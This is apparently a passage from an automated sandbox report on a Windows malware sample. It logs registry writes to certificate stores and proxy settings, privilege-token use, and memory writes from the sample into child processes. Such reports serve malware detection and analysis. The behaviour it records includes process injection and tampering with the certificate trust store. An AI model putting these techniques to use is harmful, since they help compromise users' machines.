Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" rfVcCs84JgkadF5csIFA6eOA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" rfVcCs84JgkadF5csIFA6eOA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" rfVcCs84JgkadF5csIFA6eOA.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" rfVcCs84JgkadF5csIFA6eOA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" O8M8v9erpd6p9TZ5cZU71Tag.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Processes:
Z1z6oEWmHWh3S9fVhayDhyvW.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Z1z6oEWmHWh3S9fVhayDhyvW.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e Z1z6oEWmHWh3S9fVhayDhyvW.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e Z1z6oEWmHWh3S9fVhayDhyvW.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
un4.0.exePBCfG3wrCyp60tNkAdjwRCEQ.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exeLmaiU21tMWhBuhG73TdiEsIZ.exerfVcCs84JgkadF5csIFA6eOA.exeO8M8v9erpd6p9TZ5cZU71Tag.exepowershell.exepowershell.exepowershell.exerfVcCs84JgkadF5csIFA6eOA.exeO8M8v9erpd6p9TZ5cZU71Tag.exepowershell.EXELmaiU21tMWhBuhG73TdiEsIZ.exepid Process 856 un4.0.exe 856 un4.0.exe 1464 PBCfG3wrCyp60tNkAdjwRCEQ.exe 1464 PBCfG3wrCyp60tNkAdjwRCEQ.exe 1464 PBCfG3wrCyp60tNkAdjwRCEQ.exe 1464 PBCfG3wrCyp60tNkAdjwRCEQ.exe 5084 RegAsm.exe 5084 RegAsm.exe 1404 dialer.exe 1404 dialer.exe 1404 dialer.exe 1404 dialer.exe 756 powershell.exe 756 powershell.exe 1564 powershell.exe 1564 powershell.exe 2608 powershell.exe 2608 powershell.exe 756 powershell.exe 2608 powershell.exe 1564 powershell.exe 1352 LmaiU21tMWhBuhG73TdiEsIZ.exe 1352 LmaiU21tMWhBuhG73TdiEsIZ.exe 2980 rfVcCs84JgkadF5csIFA6eOA.exe 2980 rfVcCs84JgkadF5csIFA6eOA.exe 4640 O8M8v9erpd6p9TZ5cZU71Tag.exe 4640 O8M8v9erpd6p9TZ5cZU71Tag.exe 2732 powershell.exe 2732 powershell.exe 5696 powershell.exe 5696 powershell.exe 4100 powershell.exe 4100 powershell.exe 2732 powershell.exe 5696 powershell.exe 4100 powershell.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 5972 powershell.EXE 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe -
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
msbuild.exepowershell.exepowershell.exepowershell.exeLmaiU21tMWhBuhG73TdiEsIZ.exerfVcCs84JgkadF5csIFA6eOA.exeO8M8v9erpd6p9TZ5cZU71Tag.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.execsrss.exesc.exepowershell.exepowershell.exepowershell.EXEdescription pid Process Token: SeDebugPrivilege 1512 msbuild.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 1352 LmaiU21tMWhBuhG73TdiEsIZ.exe Token: SeImpersonatePrivilege 1352 LmaiU21tMWhBuhG73TdiEsIZ.exe Token: SeDebugPrivilege 2980 rfVcCs84JgkadF5csIFA6eOA.exe Token: SeImpersonatePrivilege 2980 rfVcCs84JgkadF5csIFA6eOA.exe Token: SeDebugPrivilege 4640 O8M8v9erpd6p9TZ5cZU71Tag.exe Token: SeImpersonatePrivilege 4640 O8M8v9erpd6p9TZ5cZU71Tag.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 5696 powershell.exe Token: SeDebugPrivilege 4100 powershell.exe Token: SeDebugPrivilege 5972 powershell.EXE Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 5332 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 6104 powershell.exe Token: SeDebugPrivilege 3896 powershell.EXE Token: SeDebugPrivilege 5616 powershell.exe Token: SeDebugPrivilege 5516 powershell.exe Token: SeSystemEnvironmentPrivilege 5544 csrss.exe Token: SeSecurityPrivilege 5448 sc.exe Token: SeSecurityPrivilege 5448 sc.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 5828 powershell.exe Token: SeDebugPrivilege 5320 powershell.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
un4.1.exepid Process 4232 un4.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exemsbuild.exePPShZLAKQ6L4xgy8fCGXP1YJ.exeMaKDbFZoKxsMGQUEadkOBsmF.exeRegAsm.exeun4.1.exeZ1z6oEWmHWh3S9fVhayDhyvW.execmd.exedescription pid Process procid_target PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4204 wrote to memory of 2304 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 88 PID 4204 wrote to memory of 2304 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 88 PID 4204 wrote to memory of 2304 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 88 PID 1512 wrote to memory of 832 1512 msbuild.exe 92 PID 1512 wrote to memory of 832 1512 msbuild.exe 92 PID 1512 wrote to memory of 832 1512 msbuild.exe 92 PID 1512 wrote to memory of 4640 1512 msbuild.exe 201 PID 1512 wrote to memory of 4640 1512 msbuild.exe 201 PID 1512 wrote to memory of 4640 1512 msbuild.exe 201 PID 1512 wrote to memory of 2980 1512 msbuild.exe 94 PID 1512 wrote to memory of 2980 1512 msbuild.exe 94 PID 1512 wrote to memory of 2980 1512 msbuild.exe 94 PID 1512 wrote to memory of 4912 1512 msbuild.exe 138 PID 1512 wrote to memory of 4912 1512 msbuild.exe 138 PID 1512 wrote to memory of 4912 1512 msbuild.exe 138 PID 1512 wrote to memory of 1464 1512 msbuild.exe 98 PID 1512 wrote to memory of 1464 1512 msbuild.exe 98 PID 1512 wrote to memory of 1464 1512 msbuild.exe 98 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 4912 wrote to memory of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 PID 832 wrote to memory of 856 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 102 PID 832 wrote to memory of 856 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 102 PID 832 wrote to memory of 856 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 102 PID 1512 wrote to memory of 1352 1512 msbuild.exe 104 PID 1512 wrote to memory of 1352 1512 msbuild.exe 104 PID 1512 wrote to memory of 1352 1512 msbuild.exe 104 PID 832 wrote to memory of 4232 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 107 PID 832 wrote to memory of 4232 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 107 PID 832 wrote to memory of 4232 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 107 PID 5084 wrote to memory of 1404 5084 RegAsm.exe 110 PID 5084 wrote to memory of 1404 5084 RegAsm.exe 110 PID 5084 wrote to memory of 1404 5084 RegAsm.exe 110 PID 5084 wrote to memory of 1404 5084 RegAsm.exe 110 PID 5084 wrote to memory of 1404 5084 RegAsm.exe 110 PID 1512 wrote to memory of 440 1512 msbuild.exe 111 PID 1512 wrote to memory of 440 1512 msbuild.exe 111 PID 4232 wrote to memory of 1604 4232 un4.1.exe 114 PID 4232 wrote to memory of 1604 4232 un4.1.exe 114 PID 4232 wrote to memory of 1604 4232 un4.1.exe 114 PID 1512 wrote to memory of 1880 1512 msbuild.exe 120 PID 1512 wrote to memory of 1880 1512 msbuild.exe 120 PID 1512 wrote to memory of 1880 1512 msbuild.exe 120 PID 1880 wrote to memory of 2260 1880 Z1z6oEWmHWh3S9fVhayDhyvW.exe 121 PID 1880 wrote to memory of 2260 1880 Z1z6oEWmHWh3S9fVhayDhyvW.exe 121 PID 1880 wrote to memory of 2260 1880 